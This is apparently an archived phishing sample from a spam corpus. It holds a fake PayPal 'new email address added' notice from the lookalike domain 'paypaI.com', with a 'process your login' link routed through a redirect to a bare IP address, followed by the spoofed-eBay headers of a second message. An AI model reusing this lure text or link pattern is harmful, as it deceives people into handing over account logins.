From: "Update Now" <email-change@paypaI.com>
Subject: Notice
Date: Fri, 17 Feb 2006 02:44:47 +0200
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <20060217004528.3BD3B6CCF44@mail1.example.com>
To: undisclosed-recipients: ;
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 418

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<div align="left" class="style2">
  <p class="style2"><FONT face="Courier New" size="2">You have added <i><b>
  johny26@cox.com</b></i> as a new email address for your
PayPal account.</font><br>
    <font face="Courier New" size="2">If you don't agree with this email and if you need assistance with your account,<br>
  click here and 
	<a target="_blank" href="http://rds.yahoo.com/S=44831148:D1/CS=44831148/SS=44831166/SIG=11v8331g7/*http:/61.58.47.183/page/update/">process your login</a>. </font> </p>
    </p>
  <p><font face="Courier New" size="2">Thank you for using PayPal! <br>
    The PayPal Team </font> </p>
  <address><span style="font-style: normal"><font face="Courier New" size="2">Please do not reply to this email. This mailbox is not monitored and you will not receive a response.</font></span></address>
  <address><font face="Courier New" size="2"><span style="font-style: normal">For assistance,log in to your 
  PayPal account and click thec Help link located in the top right corner </span>
  </font>
    </address>
  <address><font face="Courier New" size="2"><span style="font-style: normal">of any 
  PayPal page. </span> <br>
    </font>
    </address>
  <p><font face="Courier New" size="2">PayPal Email ID PP007 </font> </p>
</div>
</body>
</html>

From aw-confirm@ebay.com  Fri Feb 17 00:48:24 2006
Return-Path: <aw-confirm@ebay.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id E644F537148
	for <nobody@login.example.com>; Fri, 17 Feb 2006 00:48:23 -0500 (EST)
Received: from 144616720 (unknown [221.156.215.74])
	by mail2.example.com (Postfix) with SMTP id 988AA6FA311
	for <nobody@example.com>; Fri, 17 Feb 2006 00:48:22 -0500 (EST)
Received: from ebay.com (141957232 [144982848])
	by lopezclub.com (Qmailv1) with ESMTP id E8C6559C84
	for <nobody@example.com>; Fri, 17 Feb 2006 09:47:41 -0800
Date: Fri, 17 Feb 2006 09:47:41 -0800
